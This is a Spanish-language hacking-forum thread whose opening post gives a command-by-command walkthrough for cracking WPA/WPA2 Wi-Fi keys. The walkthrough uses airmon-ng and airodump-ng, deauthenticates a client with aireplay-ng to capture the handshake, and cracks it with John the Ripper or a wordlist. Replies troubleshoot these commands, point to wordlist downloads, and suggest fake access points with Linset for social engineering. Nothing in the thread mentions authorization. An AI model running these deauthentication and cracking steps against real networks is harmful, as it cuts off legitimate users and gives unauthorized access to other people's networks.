Taller de Seguridad Wireless #4

Iniciado por ANTRAX, Septiembre 28, 2014, 03:40:52 PM

Tema anterior - Siguiente tema

0 Miembros y 2 Visitantes están viendo este tema.


Introducción

Para poder obtener la clave de una red con cifrado WPA/WPA2, debemos capturar el Handshake de algún cliente y luego desencriptarlo.
Para lo que no sepan lo que es el Handshake se genera en el momento en el que un dispositivo se conecta en una red. La clave pre-compartida puede tener un tamaño de 8 a 63 caracteres, por lo que parece imposible crackear la clave.


Como se muestra en la imagen, el dispositivo envía una solicitud de conexión al router, el router responde pidiendo la clave de acceso, el dispositivo envía la clave de acceso. El router responde a esa autenticación, si es correcta se produce la asociación a la red y el router responde con un OK, es decir, lo asocia a la red.

Esta negociación que se produce, es el Handshake (Apretón de manos) y lo que haremos en este taller, será capturarlo y descifrarlo, ya que la contraseña viene cifrada dentro de él.

No hay ninguna diferencia entre el crackeo de redes WPA o WPA2. El método de autenticación es básicamente el mismo. Por lo que las técnicas a usar son idénticas.

Colocando nuestra interface en modo monitor

Lo que haremos ahora será ver el nombre de nuestra interface, para ello tipeamos lo siguiente:

airmon-ng


En mi caso figuran dos interfaces:

Wlan2: La placa de red que tiene mi notebook
Wlan1: Mi USB Wifi externo

Debido a que la placa de mi notebook no sirve para usarla con aircrack, usaré mi USB Wifi externo, es decir, la Wlan1
Ahora la pondremos en modo monitor con el siguiente comando:

airmon-ng start wlan1


Como muestra la imagen, la coloca en modo monitor
(Monitor mode enablen on mon0)

Scanneo de las redes cercanas

Para ver las redes que tenemos cerca, lanzaremos el siguiente comando:

airodump-ng mon0


Como bien dijimos al principio de este taller, el Handshake se genera a la hora de que un cliente se conecta a la red. Es por ello, que nuestro objetivo ahora será tirar a un cliente conectado, y cuando intente conectarse nuevamente, capturaremos ese Handshake.

Lo que debemos recordar de esta consola, son los siguientes datos:

BSSID (MAC del router)
STATION (MAC del Cliente conectado)
CH (Canal)

Frenamos el scanneo con la siguiente combinación de teclas CTRL + C

Seguido a esto, colocamos el siguiente comando:

airodump-ng mon0 --channel 1 --bssid D8:5D:4C:C7:DC:EE -w /underc0de

Explicaré brevemente los parámetros de este comando:

mon0 (Nuestra interface en modo monitor)
--channel (Canal)
--bssid (MAC del router al que atacaremos)
-w (Nombre del archivo en donde se guardará el handshake)

Volveremos a ver la misma pantalla que la anterior, pero esta vez solo observaremos el movimiento que está generando el router al que atraparemos.

Capturando el Handshake

En una nueva consola, procederemos a conectar uno de los clientes conectados para capturarle el Handshake, para ello, tipearemos el siguiente comando:

aireplay-ng -0 1 -a D8:5D:4C:C7:DC:EE -c 00:25:D3:4C:1B:84 mon0


En caso de que al tipear el comando, aparezca un error como el de la imagen, al mismo comando le añadimos --ignore-negative-one

aireplay-ng -0 1 -a D8:5D:4C:C7:DC:EE -c 00:25:D3:4C:1B:84 mon0 --ignore-negative-one

Esto sucede porque tenemos que aplicarle un parche a nuestro kernel, pero la forma más rápida es añadiendo la extensión al comando como hicimos.

Al ejecutar el comando, veremos como desconecta al cliente conectado, y en la otra consola podremos ver lo siguiente en la parte superior:


Como podemos observar, aparece el [WPA handshake D8:5D:4C:C7:DC:EE]

Eso quiere decir que ya capturamos el Handshake de la red. Ahora podemos cerrar todas las consolas activas e iniciar el proceso de cracking.

Crackeando el Handshake por Fuerza bruta

Para crackear el handshake por fuerza bruta, utilizaremos John The Ripper, el cual es un excelente para este tipo de tareas.

En una consola tipeamos lo siguiente

john –stdout:XX --incremental:YY | aircrack-ng -b D8:5D:4C:C7:DC:EE -w - /underc0de*.cap

En el comando se pueden reemplazar las XX por:

alpha  (solo letras)
digits  (solo números)
alnum   (numeros y letras)
all  (Todos los caracteres incluidos ",.-#%&)

Las YY son los números de caracteres que puede tener la contraseña, si colocamos 8, John the ripper combinará desde 1 hasta 8 caracteres.


Lo malo de esto, es que puede demorar desde minutos a años en sacar una clave. Y depende mucho del hardware que tengamos en nuestra pc.

Crackeando el Handshake por Diccionario

Para poder romper la clave por diccionario, colocaremos en la consola el siguiente comando:

aircrack-ng -w diccionario.txt -b D8:5D:4C:C7:DC:EE /underc0de*.cap

Rapidamente explicaré los parámetros del comando

-w (Nombre del diccionario)
-b (MAC del router)

Y finalmente el nombre del Handshake


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



 
Excelente aporte! Gracias.

G.

PD: Sed buenos.  ;D
Tú te enamoraste de mi valentía, yo me enamoré de tu oscuridad; tú aprendiste a vencer tus miedos, yo aprendí a no perderme en tu abismo.


Septiembre 30, 2014, 06:36:37 AM #3 Ultima modificación: Octubre 01, 2014, 01:07:02 PM por fermino
Buenos dias, una pregunta, ¿diccionarios de donde se pueden sacar?

Septiembre 30, 2014, 06:44:55 AM #4 Ultima modificación: Septiembre 30, 2014, 06:46:31 AM por blackdrake
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
buenos dias una pregunta diccionarios donde se pueden sacar?

Te dejo unos enlaces y unas webs donde puedes descargartelos:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Dependiendo de para que, necesitarás descargarte uno u otro.

Un saludo.



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
buenos dias una pregunta diccionarios donde se pueden sacar?

Te dejo unos enlaces y unas webs donde puedes descargartelos:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Dependiendo de para que, necesitarás descargarte uno u otro.

Un saludo.

muchas gracias blackdrake  :) :) :) :)

Septiembre 30, 2014, 08:59:11 AM #6 Ultima modificación: Octubre 02, 2014, 09:05:32 AM por blackdrake
Tengo un problema pongo este comando para realizar fuerza bruta con mi router
john -stdout: all --incremental:10 | aircrack-ng -b  MAC -w - mia-01.cap

y me sale esto:

Código: php
Password files specified, but no option would use them
Opening mia-01.cap
Reading packets, please wait...

                                 Aircrack-ng 1.2 beta3
Passphrase not in dictionary                           

Quitting aircrack-ng...

pero el problema es que no tarda ni 1 segundo y sale eso


alguien me puede ayudar?

Probá asi:

john –stdout –incremental:all | aircrack-ng -b MAC -w – fichero.cap

Recordá estar parado en el directorio en donde se encuentra el .cap

Saludos!
ANTRAX


Asi si que va Antrax gracias! y eso que prueba todo tipo de contraseñas de tamaño de caracteres? porque "all" significa que todo letras,simblos,numeros pero el tamaño de caracteres de contraseña donde lo pone?

A eso lo puedes modificar como muestra el paper.

john –stdout –incremental:10 | aircrack-ng -b MAC -w – fichero.cap


Octubre 02, 2014, 08:48:20 AM #10 Ultima modificación: Octubre 02, 2014, 08:49:38 AM por blackdrake
Hola buenas tardes tengo una consulta cuando yo
Escribo este codigo:

Código: php
aireplay-ng -0 7676 -a MAC BSSID -c MI MAC mon0


Y el Me responde esto:
Código: php

13:07:38  Waiting for beacon frame (BSSID: MAC BSSID) on channel 1
13:07:40  Sending 64 directed DeAuth. STMAC: [MI MAC][ 0|36 ACKs]
13:07:40  Sending 64 directed DeAuth. STMAC: [MI MAC][ 0|44 ACKs]



Y no me sale como en tu tutorial que sale por ejemplo [ 47|36 ACKs]
y no entiendo el motivo la tarjeta de red es la misma

Proba con otro cliente conectado.
Si no te funciona con uno, ve con el que sigue.. y así hasta que te inyecte

Saludos!
ANTRAX


Muy bueno como siempre  ;D
RollthBuen hacker mejor No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Gracias por la info!

Entiendo que este método no es el mejor ya que por fuerza bruta, si has puesto una contraseña de complejidad media podés tardar la vida en sacar la pass por lo que no veo que sea muy útil. Creo que es más útil realizar un Fake AP y tirar un poco de ingeniería social, utilizando Linset, no?

Un saludo!

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Gracias por la info!

Entiendo que este método no es el mejor ya que por fuerza bruta, si has puesto una contraseña de complejidad media podés tardar la vida en sacar la pass por lo que no veo que sea muy útil. Creo que es más útil realizar un Fake AP y tirar un poco de ingeniería social, utilizando Linset, no?

Un saludo!

Exactamente, si con WPS o fuerza bruta no puedes, solo te quedaría mediante ingeniera social utilizando un fake AP.

Saludos

Lo unico que me sale mal.. es cuando uso 'kali' .. al querer montar a modo monitor.. queda en wlan0mon y si la vuelto a 'airmon-ng stop' queda.. wlan0monmon .. jeje.. solucion?

Febrero 13, 2017, 08:50:59 PM #16 Ultima modificación: Febrero 14, 2017, 07:02:56 PM por AncientOne
Excelente trabajo, he querido aprender a como hacerlo, lo intentare y veré que tal, gracias por el aporte.  ;D Por cierto, una duda, ¿todo el proceso puede hacerse sin alguna conexión Wi-Fi?
Push yourself as far as you can and when you can't keep going until the end...

mi estimado, en tu experiencia las tarjetas incluidas en las laptops permiten la inyeccion? ....

Lo recomendable, es buscar que modelo de placa tienes, en base a eso, verificar si el chipset soporta inyección o solo monitor.

saludos.

Octubre 04, 2017, 08:47:30 PM #19 Ultima modificación: Octubre 04, 2017, 09:06:09 PM por Rikt
Cuando voy a realizar el comando
aireplay-ng -0 1 -a D8:5D:4C:C7:DC:EE -c 00:25:D3:4C:1B:84 mon0

no funciona, incluso con:
aireplay-ng -0 1 -a D8:5D:4C:C7:DC:EE -c 00:25:D3:4C:1B:84 mon0 --ignore-negative-one

¿Porque ocurre esto?
Uso un boot, pero no es persistente.

Otra cosa remarcable es que cuando realizo el analisis de red, las bssid solo me salen al principio , y van desapareciendo (para verlas tengo que hacer un pantallazo), hasta no salir ninguna, de hecho algunas veces no aparece la station correspondiente.
Me aparecen las station por otro lado con los  data ch etc...